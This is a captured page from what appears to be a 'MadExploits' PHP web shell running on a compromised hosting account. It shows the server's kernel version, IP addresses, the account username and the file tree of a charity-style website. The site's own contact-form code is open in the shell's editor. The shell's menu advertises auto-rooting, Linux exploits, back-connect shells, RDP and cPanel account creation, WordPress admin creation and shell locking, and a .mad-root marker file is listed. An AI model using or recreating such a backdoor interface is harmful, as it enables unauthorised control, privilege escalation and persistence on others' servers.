Linux in-mum-web1949.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
: 2a02:4780:11:2049:0:237f:5677:4 | : 216.73.217.12
Cant Read [ /etc/named.conf ]
7.4.33
u595547767
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
u595547767 /
domains /
ardhram.com /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Donation.html
12.88
KB
-rw-r--r--
Gallery.html
14.3
KB
-rw-r--r--
about.html
9.49
KB
-rw-r--r--
contact.html
11.69
KB
-rw-r--r--
contact.php
1.7
KB
-rw-r--r--
contactform.php
1.53
KB
-rw-r--r--
index.html
20.74
KB
-rw-r--r--
our-team.html
10.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contactform.php
<?php // Check if the form is submitted if ($_SERVER["REQUEST_METHOD"] == "POST") { // Capture form data $name = htmlspecialchars($_POST['name']); $email = htmlspecialchars($_POST['email']); $tel = htmlspecialchars($_POST['tel']); $subject = "Be A Volunteer"; $date=date('Y-m-d'); $to = "info@ardhram.com"; $headers = "MIME-Version: 1.0" . "\r\n"; $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; $headers .= 'From: <info@ardhram.com>' . "\r\n"; $body = " <html> <head> <title>HTML email</title> </head> <body> <table border='1'> <tr> <th>Name</th> <td>".$name."</td> </tr> <tr> <th>Email</th> <td>".$email."</td> </tr> <th>Phone</th> <td>".$tel."</td> </tr> <tr> </table> </body> </html> "; if (mail($to, $subject, $body, $headers)) { echo "<script>alert('Your inquiry submitted successfully!');</script>"; echo "<script>window.location = 'index.html';</script>"; } else{ echo "<script>alert('Failed to send the inquiry. Please try again later.!');</script>"; } } else { echo "Invalid request!"; } ?>
Close